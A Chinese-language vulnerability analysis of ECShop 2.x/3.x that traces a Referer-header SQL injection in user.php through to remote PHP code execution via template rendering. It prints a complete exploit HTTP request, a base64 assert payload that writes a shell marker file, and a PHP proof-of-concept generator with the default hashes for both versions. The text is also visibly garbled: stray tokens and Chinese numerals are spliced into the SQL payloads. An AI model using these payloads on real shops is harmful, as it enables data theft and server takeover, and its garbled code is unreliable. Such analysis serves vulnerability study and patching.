ECShop是一款B2C独立网店系统 ,适合企业和个人快速打造个性化网店。 系统是基于PHP语言及MYSQL跨平台开源程序的数据库架构开发。
在2017年及以前的版本中, user.php的display在函数中,模板变量可以控制,导致注入,远程代码可以与注入一起执行
0x02 影响范围ECShop 2.xECShop 3.x0x03 漏洞分析
路由知识ringk3y哥哥把这个漏洞分析得很清楚,整个使用和绕过的过程非常精彩。感谢分享和p神提供的环境.
SQL注入:
在user.php中
$back_act变量来源于HTTP_REFERER, assign在模板变量中赋值函数。
继续跟踪 display函数
读取user_passport.dwt解析变量后的模板文件内容显示html内容,用_echash做分割,得到$k然后交给isnert_mod处理,由于_echash它是默认的,不是随机生成的,所以$val内容可以随意控制。
接着看 insert_mod函数
=1pc动态调用在这里,=1pc$val传入进来用|分割,参数进入时需要序列化。
=1pc再看include/lib_insert.php中的insert_ads函数
=1pc
这里可以直接注入
GET /user.php?act=login HTTP/1.1Accept: */*Accept-Language: zh-CNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: IPPragma: no-cacheCookie: PHPSESSID=7dd64ac53c93500b5dff70fdc0163f2e; ECS_ID=057fee67dd00d21af00d81537cb1d09e0946bdec; ECS[visit_times]=2Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:72:\\"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\\";s:2:\\"id\\";i:1;}Connection: close
代码执行:
继续看fetch函数
追踪_eval函数
$position_style数据库中查询结构的变量
然后我们继续构造SQL注入,因为这段sql操作 order by部分换行不能截断 所以需要在id配合处理结构注释num进行union查询
payload:
SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1535678679' AND end_time >= '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,2、4、5、6、7、9-- -
函数中有一个判断:
=1pc我们 id传入’/*
=1pcnum传入*/ union select 1,0x272f2a,三、四、五、六、七、八、九10– -就能绕过了
var_dump()一下
再看fetch函数,传入的参数被fetch_str函数处理了
追踪fetch_str函数,这里的字符串处理过程比较复杂
return preg_replace(\\"/{([^\\}\\{\ ]*)}/e\\", \\"\\$this->select('\\\\1');\\", $source);
这意味着例如$source是xxxx{$asd}xxx,那么这行代码处理后,就是返回this->select(‘$asd结果, 看看select函数:
第一个字符是$时进入$this->get_val函数
我们$val没有.$又进入make_var函数
最后,从变量中引入单引号逃逸, 我们要闭合_var所以最终payload是:
{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ==);xxx
P神用在这里php写了一个Poc:这里2.x跟3.x的hash不一样,因此,使用时需要更改:
<?php$shell = bin2hex(\\"{\\$asd'];phpinfo\ ()xxx\\");$id = \\"-1' UNION/*\\";$arr =[ \\"num\\" => sprintf('*/SELECT 1,0x%s,四、五、六、七、八x%s,10-- -', bin2hex($id), $shell), \\"id\\" => $id];$s = serialize($arr);$hash3 = '45ea207d7a2b68c49582d2d22adf953a';$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';echo \\"POC for ECShop 2.x: \ \\";echo \\"{$hash2}ads|{$s}{$hash2}\\";echo \\"\ \ POC for ECShop 3.x: \ \\";echo \\"{$hash3}ads|{$s}{$hash3}\\";
把poc放到php环境运行:
2.x执行结果如下 :
路由网3.x 执行结果如下:
0x04 修复建议最新的3.6.最新版本0已修复,建议升级最新版本!
Reference:
https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdhttp://ringk3y.com/2018/08/31/ecshop2-x代码执行/